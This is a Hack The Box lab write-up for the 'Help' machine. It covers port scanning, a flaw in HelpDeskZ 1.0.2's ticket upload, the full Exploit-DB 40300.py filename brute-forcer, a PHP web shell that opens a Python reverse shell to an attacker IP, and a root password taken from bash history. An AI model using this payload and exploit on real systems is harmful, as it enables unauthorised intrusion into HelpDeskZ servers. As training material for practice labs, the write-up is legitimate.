I"œZ<h1 id="htb-help-101010121-machine-write-up">HTB Help (10.10.10.121) MACHINE WRITE-UP</h1>

<h2 id="part-1--initial-recon">PART 1 : INITIAL RECON</h2>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>nmap <span class="nt">--min-rate</span> 700 <span class="nt">-p-</span> <span class="nt">-v</span> 10.10.10.121
<span class="go">
  PORT     STATE SERVICE
  22/tcp   open  ssh
  80/tcp   open  http
  3000/tcp open  ppp

</span><span class="gp">$</span><span class="w"> </span>nmap <span class="nt">-oN</span> help.nmap <span class="nt">-p22</span>,80,3000 <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-v</span> 10.10.10.121
<span class="go">
  PORT     STATE SERVICE VERSION
</span><span class="gp">  22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux;</span><span class="w"> </span>protocol 2.0<span class="o">)</span>
<span class="go">  | ssh-hostkey: 
  |   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
  |   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
  |_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
  80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
  | http-methods: 
  |_  Supported Methods: POST OPTIONS GET HEAD
  |_http-server-header: Apache/2.4.18 (Ubuntu)
  |_http-title: Apache2 Ubuntu Default Page: It works
  3000/tcp open  http    Node.js Express framework
  | http-methods: 
  |_  Supported Methods: GET HEAD POST OPTIONS
</span><span class="gp">  |_http-title: Site doesn't have a title (application/json;</span><span class="w"> </span><span class="nv">charset</span><span class="o">=</span>utf-8<span class="o">)</span><span class="nb">.</span>
<span class="gp">  Service Info: OS: Linux;</span><span class="w"> </span>CPE: cpe:/o:linux:linux_kernel
<span class="go">
</span></code></pre></div></div>

<hr />

<h2 id="part-2--port-enumeration">PART 2 : PORT ENUMERATION</h2>

<h3 id="tcp-port-80-http">TCP PORT 80 (http)</h3>

<ul>
  <li>
    <p>Landing Page:</p>

    <p><img src="./screenshots/80_help.png" alt="Landing Page" /></p>

    <p><strong>NOTE(S)</strong>:</p>
    <ul>
      <li>Opening tha base directory leads you to an <strong>Apache2 Default Page</strong></li>
      <li>There might be some hidden directories
        <blockquote>

        </blockquote>
      </li>
    </ul>
  </li>
  <li>Run <code class="highlighter-rouge">gobuster</code>:
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>gobuster <span class="nt">-u</span> http://10.10.10.121/ <span class="nt">-w</span> /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt <span class="nt">-x</span> php,txt
<span class="go">     
  /support (Status: 301)
  
</span></code></pre></div>    </div>
  </li>
  <li>
    <p><strong><code class="highlighter-rouge">http://10.10.10.121/support/</code></strong>:</p>

    <p><img src="./screenshots/80_help_support.png" alt="HelpDeskZ" /></p>

    <p><strong>NOTE(S)</strong>:</p>
    <ul>
      <li>There is a <a href="https://github.com/evolutionscript/HelpDeskZ-1.0">HelpDeskZ</a> web service on <strong><em>/support</em></strong>
        <blockquote>

        </blockquote>
      </li>
    </ul>
  </li>
</ul>

<h3 id="tcp-port-3000-http">TCP PORT 3000 (http)</h3>

<ul>
  <li><strong><code class="highlighter-rouge">curl</code></strong>:
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>curl http://10.10.10.121:3000
</code></pre></div>    </div>
    <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="nl">"message"</span><span class="p">:</span><span class="s2">"Hi Shiv, To get access please find the credentials with given query"</span><span class="p">}</span><span class="w">
</span></code></pre></div>    </div>
    <p><strong>NOTE(S)</strong>:</p>
    <ul>
      <li>Running <code class="highlighter-rouge">gobuster</code> doesn‚Äôt seem to yield anything useful.</li>
    </ul>
  </li>
</ul>

<hr />

<h2 id="part-3--exploitation">PART 3 : EXPLOITATION</h2>

<ol>
  <li>Examine HelpDeskZ‚Äôs ticketing service:
    <ul>
      <li><strong><em>submit_ticket_controller.php</em></strong> from <a href="https://github.com/evolutionscript/HelpDeskZ-1.0/blob/master/controllers/submit_ticket_controller.php">HelpDeskZ‚Äôs git repo</a>:
        <div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">...</span>

<span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$error_msg</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="nv">$settings</span><span class="p">[</span><span class="s1">'ticket_attachment'</span><span class="p">]</span><span class="o">==</span><span class="mi">1</span><span class="p">){</span>
    <span class="nv">$uploaddir</span> <span class="o">=</span> <span class="nx">UPLOAD_DIR</span><span class="o">.</span><span class="s1">'tickets/'</span><span class="p">;</span>	
    <span class="k">if</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">'attachment'</span><span class="p">][</span><span class="s1">'error'</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">){</span>
        <span class="nv">$ext</span> <span class="o">=</span> <span class="nb">pathinfo</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">'attachment'</span><span class="p">][</span><span class="s1">'name'</span><span class="p">],</span> <span class="nx">PATHINFO_EXTENSION</span><span class="p">);</span>
        <span class="nv">$filename</span> <span class="o">=</span> <span class="nb">md5</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">'attachment'</span><span class="p">][</span><span class="s1">'name'</span><span class="p">]</span><span class="o">.</span><span class="nb">time</span><span class="p">())</span><span class="o">.</span><span class="s2">"."</span><span class="o">.</span><span class="nv">$ext</span><span class="p">;</span>
        <span class="nv">$fileuploaded</span><span class="p">[]</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="s1">'name'</span> <span class="o">=&gt;</span> <span class="nv">$_FILES</span><span class="p">[</span><span class="s1">'attachment'</span><span class="p">][</span><span class="s1">'name'</span><span class="p">],</span> <span class="s1">'enc'</span> <span class="o">=&gt;</span> <span class="nv">$filename</span><span class="p">,</span> <span class="s1">'size'</span> <span class="o">=&gt;</span> <span class="nx">formatBytes</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">'attachment'</span><span class="p">][</span><span class="s1">'size'</span><span class="p">]),</span> <span class="s1">'filetype'</span> <span class="o">=&gt;</span> <span class="nv">$_FILES</span><span class="p">[</span><span class="s1">'attachment'</span><span class="p">][</span><span class="s1">'type'</span><span class="p">]);</span>
        <span class="nv">$uploadedfile</span> <span class="o">=</span> <span class="nv">$uploaddir</span><span class="o">.</span><span class="nv">$filename</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nb">move_uploaded_file</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">'attachment'</span><span class="p">][</span><span class="s1">'tmp_name'</span><span class="p">],</span> <span class="nv">$uploadedfile</span><span class="p">))</span> <span class="p">{</span>
            <span class="nv">$show_step2</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
            <span class="nv">$error_msg</span> <span class="o">=</span> <span class="nv">$LANG</span><span class="p">[</span><span class="s1">'ERROR_UPLOADING_A_FILE'</span><span class="p">];</span>
        <span class="p">}</span><span class="k">else</span><span class="p">{</span>
            <span class="nv">$fileverification</span> <span class="o">=</span> <span class="nx">verifyAttachment</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">'attachment'</span><span class="p">]);</span>
            <span class="k">switch</span><span class="p">(</span><span class="nv">$fileverification</span><span class="p">[</span><span class="s1">'msg_code'</span><span class="p">]){</span>
                <span class="k">case</span> <span class="s1">'1'</span><span class="o">:</span>
                <span class="nv">$show_step2</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
                <span class="nv">$error_msg</span> <span class="o">=</span> <span class="nv">$LANG</span><span class="p">[</span><span class="s1">'INVALID_FILE_EXTENSION'</span><span class="p">];</span>
                <span class="k">break</span><span class="p">;</span>
                <span class="k">case</span> <span class="s1">'2'</span><span class="o">:</span>
                <span class="nv">$show_step2</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
                <span class="nv">$error_msg</span> <span class="o">=</span> <span class="nv">$LANG</span><span class="p">[</span><span class="s1">'FILE_NOT_ALLOWED'</span><span class="p">];</span>
                <span class="k">break</span><span class="p">;</span>
                <span class="k">case</span> <span class="s1">'3'</span><span class="o">:</span>
                <span class="nv">$show_step2</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
                <span class="nv">$error_msg</span> <span class="o">=</span> <span class="nb">str_replace</span><span class="p">(</span><span class="s1">'%size%'</span><span class="p">,</span><span class="nv">$fileverification</span><span class="p">[</span><span class="s1">'msg_extra'</span><span class="p">],</span><span class="nv">$LANG</span><span class="p">[</span><span class="s1">'FILE_IS_BIG'</span><span class="p">]);</span>
                <span class="k">break</span><span class="p">;</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span>	
<span class="p">}</span>

<span class="o">...</span>
</code></pre></div>        </div>
      </li>
    </ul>

    <p><strong>NOTE(S)</strong>:</p>
    <ul>
      <li>The ticketing service allows file attachments</li>
      <li>The file is uploaded to <strong>UPLOAD_DIR/tickets/</strong></li>
      <li>The filename is changed:
        <ul>
          <li>A UNIX timestamp is concatenated at the end of the filename</li>
          <li>The new filename is converted to an MD5 hash</li>
          <li>The extension is preserved</li>
        </ul>
      </li>
      <li>The file is moved to the upload directory before verifying the attachment
        <blockquote>

        </blockquote>
      </li>
    </ul>
  </li>
  <li>Exploit HelpDeskZ‚Äôs ticketing service:
    <ol>
      <li>Search and download available exploits:
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>searchsploit helpdeskz
<span class="go">
  HelpDeskZ 1.0.2 - Arbitrary File Upload                                        | exploits/php/webapps/40300.py
  HelpDeskZ &lt; 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download | exploits/php/webapps/41200.py

</span><span class="gp">#</span><span class="w"> </span>searchsploit <span class="nt">-m</span> exploits/php/webapps/40300.py
<span class="go">
    Exploit: HelpDeskZ 1.0.2 - Arbitrary File Upload
        URL: https://www.exploit-db.com/exploits/40300
       Path: /usr/share/exploitdb/exploits/php/webapps/40300.py
  File Type: troff or preprocessor input, ASCII text, with CRLF line terminators

</span></code></pre></div>        </div>
        <ul>
          <li><strong><code class="highlighter-rouge">40300.py</code></strong>
            <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">...</span><span class="n">omitted</span><span class="o">...</span>
        
<span class="kn">import</span> <span class="nn">hashlib</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">requests</span>

<span class="k">print</span> <span class="s">'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'</span>

<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">:</span>
    <span class="k">print</span> <span class="s">"Usage: {} [baseUrl] [nameOfUploadedFile]"</span><span class="o">.</span><span class="nb">format</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
    <span class="n">sys</span><span class="o">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

<span class="n">helpdeskzBaseUrl</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">fileName</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>

<span class="n">currentTime</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">time</span><span class="o">.</span><span class="n">time</span><span class="p">())</span>

<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">300</span><span class="p">):</span>
    <span class="n">plaintext</span> <span class="o">=</span> <span class="n">fileName</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">currentTime</span> <span class="o">-</span> <span class="n">x</span><span class="p">)</span>
    <span class="n">md5hash</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">md5</span><span class="p">(</span><span class="n">plaintext</span><span class="p">)</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">()</span>

    <span class="n">url</span> <span class="o">=</span> <span class="n">helpdeskzBaseUrl</span><span class="o">+</span><span class="n">md5hash</span><span class="o">+</span><span class="s">'.php'</span>
    <span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">head</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">response</span><span class="o">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"found!"</span>
        <span class="k">print</span> <span class="n">url</span>
        <span class="n">sys</span><span class="o">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>

<span class="k">print</span> <span class="s">"Sorry, I did not find anything"</span>
</code></pre></div>            </div>
          </li>
        </ul>

        <p><strong>NOTE(S)</strong>:</p>
        <ul>
          <li>It searches for your uploaded file.</li>
          <li>A UNIX timestamp up to five minutes ago is checked.
            <blockquote>

            </blockquote>
          </li>
        </ul>
      </li>
      <li>Find the ticketing service‚Äôs upload directory:
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gobuster -u http://10.10.10.121/support -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt
</span><span class="gp">#</span><span class="w"> </span>/images <span class="o">(</span>Status: 301<span class="o">)</span>
<span class="gp">#</span><span class="w"> </span>/index.php <span class="o">(</span>Status: 200<span class="o">)</span>
<span class="gp">#</span><span class="w"> </span>/uploads <span class="o">(</span>Status: 301<span class="o">)</span>
<span class="gp">#</span><span class="w"> </span>/css <span class="o">(</span>Status: 301<span class="o">)</span>
<span class="gp">#</span><span class="w"> </span>/includes <span class="o">(</span>Status: 301<span class="o">)</span>
<span class="gp">#</span><span class="w"> </span>/js <span class="o">(</span>Status: 301<span class="o">)</span>
<span class="go">
gobuster -u http://10.10.10.121/support/uploads -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt
</span><span class="gp">#</span><span class="w"> </span>/index.php <span class="o">(</span>Status: 302<span class="o">)</span>
<span class="gp">#</span><span class="w"> </span>/articles <span class="o">(</span>Status: 301<span class="o">)</span>
<span class="gp">#</span><span class="w"> </span>/tickets <span class="o">(</span>Status: 301<span class="o">)</span>
</code></pre></div>        </div>
      </li>
      <li>Exploit HelpDeskZ‚Äôs ticketing service:
        <ol>
          <li>Fill-up all the required fields</li>
          <li>Attach payload (<strong><em>shell.php</em></strong>):
            <pre><code class="language-PHP">&lt;?php

  echo system("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.12.99\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'");

?&gt;
</code></pre>
          </li>
          <li>Enter CAPTCHA</li>
          <li>Click ‚ÄúSubmit‚Äù</li>
          <li>Run the python exploit (<strong><em>40300.py</em></strong>):
            <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">python ./40300.py http://10.10.10.121/support/uploads/tickets/ shell.php
</span><span class="gp">#</span><span class="w"> </span>Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
<span class="gp">#</span><span class="w"> </span>found!
<span class="gp">#</span><span class="w"> </span>http://10.10.10.121/support/uploads/tickets/b2c187c5977426db2acf2b5195e31687.php
</code></pre></div>            </div>
          </li>
        </ol>
      </li>
      <li>Set-up the reverse shell:
        <ul>
          <li>Local terminal:
            <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">nc -lvp 4444    
</span></code></pre></div>            </div>
          </li>
          <li>Another local terminal:
            <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">curl http://10.10.10.121/support/uploads/tickets/b2c187c5977426db2acf2b5195e31687.php
</span></code></pre></div>            </div>
          </li>
          <li>While inside the reverse shell:
            <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">python -c 'import pty;</span><span class="w"> </span>pty.spawn<span class="o">(</span><span class="s2">"/bin/bash"</span><span class="o">)</span><span class="s1">'
</span><span class="go">
id
</span><span class="gp">#</span><span class="w"> </span><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span><span class="nb">help</span><span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span><span class="nb">help</span><span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span><span class="nb">help</span><span class="o">)</span>,4<span class="o">(</span>adm<span class="o">)</span>,24<span class="o">(</span>cdrom<span class="o">)</span>,30<span class="o">(</span>dip<span class="o">)</span>,33<span class="o">(</span>www-data<span class="o">)</span>,46<span class="o">(</span>plugdev<span class="o">)</span>,114<span class="o">(</span>lpadmin<span class="o">)</span>,115<span class="o">(</span>sambashare<span class="o">)</span>
<span class="go">
cd ~
cat user.txt
</span><span class="gp">#</span><span class="w"> </span>bb8a7b36bdce0c61ccebaa173ef946af
</code></pre></div>            </div>
          </li>
        </ul>
      </li>
    </ol>
  </li>
</ol>

<hr />

<h2 id="part-4--privilege-escalation-help---root">PART 4 : Privilege Escalation (help -&gt; root)</h2>

<ol>
  <li>Check files in the /home/help (<strong>~/</strong>) directory:
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">cat .bash_history
</span><span class="gp">#</span><span class="w"> </span>...
<span class="gp">#</span><span class="w"> </span>su
<span class="gp">#</span><span class="w"> </span>su
<span class="gp">#</span><span class="w"> </span>rOOTmEoRdIE
<span class="gp">#</span><span class="w"> </span>su
<span class="gp">#</span><span class="w"> </span>...
<span class="go">   
su root
</span><span class="gp">#</span><span class="w"> </span>Password: RootMeOrDie
<span class="go">   
id
</span><span class="gp">#</span><span class="w"> </span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
<span class="go"> 
cat /root/root.txt
</span><span class="gp">#</span><span class="w"> </span>b7fe6082dcdf0c1b1e02ab0d9daddb98
</code></pre></div>    </div>
    <p><strong>NOTE(S)</strong>:</p>
    <ul>
      <li>There seems to be an apparent attempt to use <code class="highlighter-rouge">su</code></li>
      <li>‚Äú<strong>rOOTmEoRdIE</strong>‚Äù doesn‚Äôt work to authenticate <strong>root</strong>
        <ul>
          <li>Maybe it was entered with CAPS LOCK on</li>
          <li>‚Äú<strong>RootMeOrDie</strong>‚Äù works</li>
        </ul>
      </li>
    </ul>
  </li>
</ol>
:ET